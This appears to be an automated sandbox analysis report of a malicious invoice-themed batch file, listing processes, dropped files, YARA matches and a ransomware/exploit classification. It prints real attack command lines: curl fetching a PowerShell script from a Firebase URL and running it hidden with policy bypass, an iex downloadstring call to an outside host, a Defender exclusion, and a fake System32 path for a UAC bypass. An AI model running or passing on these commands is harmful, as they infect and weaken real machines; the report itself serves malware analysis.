Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/PesterXzi
Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000D.00000002.29797055442.000000000052B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30385728857.0000014C514FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown HTTPS traffic detected: 93.127.200.211:443 -> 192.168.11.20:49752 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_6872.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7380.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6872, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows \System32\fodhelper.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\exe.txt Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\_kjfech8_V.exe (copy) Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\MSVCR100.txt Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\i7.txt Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\MSVCR100.dll (copy) Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\WebView2Loader.dll (copy) Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\WebView2Loader.txt Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\jli.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\_kjfech8_Vi7.exe (copy) Jump to dropped file
Uses shutdown.exe to shutdown or reboot the system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\shutdown.exe "C:\Windows\system32\shutdown.exe" /r /t 10
Creates files inside the system directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows \System32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows \System32\fodhelper.exe Jump to behavior
Detected potential crypto function
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDE6E18 9_2_6FDE6E18
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD86E28 9_2_6FD86E28
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD86E24 9_2_6FD86E24
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDBEB1A 9_2_6FDBEB1A
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDA0919 9_2_6FDA0919
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FE00915 9_2_6FE00915
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FE167FF 9_2_6FE167FF
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDEE7F1 9_2_6FDEE7F1
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD945AE 9_2_6FD945AE
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD88468 9_2_6FD88468
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD8839B 9_2_6FD8839B
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDE22CD 9_2_6FDE22CD
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD8828B 9_2_6FD8828B
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCA277 9_2_6FDCA277
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FE08220 9_2_6FE08220
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD8A1DD 9_2_6FD8A1DD
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD721F0 9_2_6FD721F0
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDE4159 9_2_6FDE4159
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCDF35 9_2_6FDCDF35
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD85E20 9_2_6FD85E20
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD83DB1 9_2_6FD83DB1
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD87D20 9_2_6FD87D20
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FE01CEF 9_2_6FE01CEF
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD89C8E 9_2_6FD89C8E
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD83B1D 9_2_6FD83B1D
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FE17B2A 9_2_6FE17B2A
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FE11AE0 9_2_6FE11AE0
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCDA38 9_2_6FDCDA38
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FE03968 9_2_6FE03968
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDEF8BA 9_2_6FDEF8BA
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDE9877 9_2_6FDE9877
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD85795 9_2_6FD85795
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FE0D754 9_2_6FE0D754
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDEB723 9_2_6FDEB723
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD896C9 9_2_6FD896C9
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FE196A7 9_2_6FE196A7
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD875C1 9_2_6FD875C1
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD835FA 9_2_6FD835FA
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCD4FF 9_2_6FDCD4FF
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDED43B 9_2_6FDED43B
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FE19295 9_2_6FE19295
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD87210 9_2_6FD87210
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDE31BA 9_2_6FDE31BA
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDE516D 9_2_6FDE516D
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD9911E 9_2_6FD9911E
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDE6E18 11_2_6FDE6E18
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD86E28 11_2_6FD86E28
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD86E24 11_2_6FD86E24
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDBEB1A 11_2_6FDBEB1A
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDA0919 11_2_6FDA0919
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FE00915 11_2_6FE00915
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FE167FF 11_2_6FE167FF
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDEE7F1 11_2_6FDEE7F1
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD945AE 11_2_6FD945AE
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD88468 11_2_6FD88468
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD8839B 11_2_6FD8839B
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDE22CD 11_2_6FDE22CD
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD8828B 11_2_6FD8828B
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCA277 11_2_6FDCA277
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FE08220 11_2_6FE08220
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD8A1DD 11_2_6FD8A1DD
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD721F0 11_2_6FD721F0
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDE4159 11_2_6FDE4159
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCDF35 11_2_6FDCDF35
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD85E20 11_2_6FD85E20
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD83DB1 11_2_6FD83DB1
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD87D20 11_2_6FD87D20
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FE01CEF 11_2_6FE01CEF
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD89C8E 11_2_6FD89C8E
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD83B1D 11_2_6FD83B1D
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FE17B2A 11_2_6FE17B2A
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FE11AE0 11_2_6FE11AE0
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCDA38 11_2_6FDCDA38
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FE03968 11_2_6FE03968
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDEF8BA 11_2_6FDEF8BA
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDE9877 11_2_6FDE9877
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD85795 11_2_6FD85795
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FE0D754 11_2_6FE0D754
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDEB723 11_2_6FDEB723
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD896C9 11_2_6FD896C9
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FE196A7 11_2_6FE196A7
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD875C1 11_2_6FD875C1
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD835FA 11_2_6FD835FA
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCD4FF 11_2_6FDCD4FF
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDED43B 11_2_6FDED43B
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FE19295 11_2_6FE19295
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD87210 11_2_6FD87210
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDE31BA 11_2_6FDE31BA
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDE516D 11_2_6FDE516D
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD9911E 11_2_6FD9911E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0419A550 13_2_0419A550
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0419E488 13_2_0419E488
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0419A541 13_2_0419A541
Found potential string decryption / allocating functions
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: String function: 6FD80950 appears 302 times
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: String function: 6FD8B69A appears 122 times
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: String function: 6FD83A30 appears 34 times
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: String function: 6FD8A42E appears 50 times
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: String function: 6FD8D778 appears 46 times
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: String function: 6FD8072B appears 54 times
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: String function: 6FD8A455 appears 78 times
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: String function: 6FD80934 appears 148 times
One or more processes crash
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 1184
PE file contains more sections than normal
Source: jli.dll.4.dr Static PE information: Number of sections : 11 > 10
Yara signature match
Source: amsi64_6872.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7380.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6872, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.rans.expl.evad.winBAT@26/50@1/3
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCD3BB _getdiskfree,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,memset,GetDiskFreeSpaceA,GetLastError,_errno, 9_2_6FDCD3BB
Source: C:\Windows\System32\curl.exe File created: C:\Users\Public\Documents\vs1.ps1 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1684:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1492
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1684:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blqdhdij.dyb.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" "
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\curl.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1"
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -win 1 -
Source: unknown Process created: C:\_kjfech8_V\_kjfech8_Vi7.exe "C:\_kjfech8_V\_kjfech8_Vi7.exe"
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\_kjfech8_V\_kjfech8_Vi7.exe "C:\_kjfech8_V\_kjfech8_Vi7.exe"
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 1184
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\shutdown.exe "C:\Windows\system32\shutdown.exe" /r /t 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "$psakeDir = ([array](dir """C:\Users\user\Desktop\vendor\packages\psake.*"""))[-1]; ".$psakeDir\tools\psake.ps1" build.psake.ps1 -ScriptPath "$psakeDir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "$psakeDir = ([array](dir """C:\Users\user\Desktop\vendor\packages\psake.*"""))[-1]; ".$psakeDir\tools\psake.ps1" build.psake.ps1 -ScriptPath "$psakeDir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\_kjfech8_V\_kjfech8_Vi7.exe "C:\_kjfech8_V\_kjfech8_Vi7.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\shutdown.exe "C:\Windows\system32\shutdown.exe" /r /t 10 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -win 1 - Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V" Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
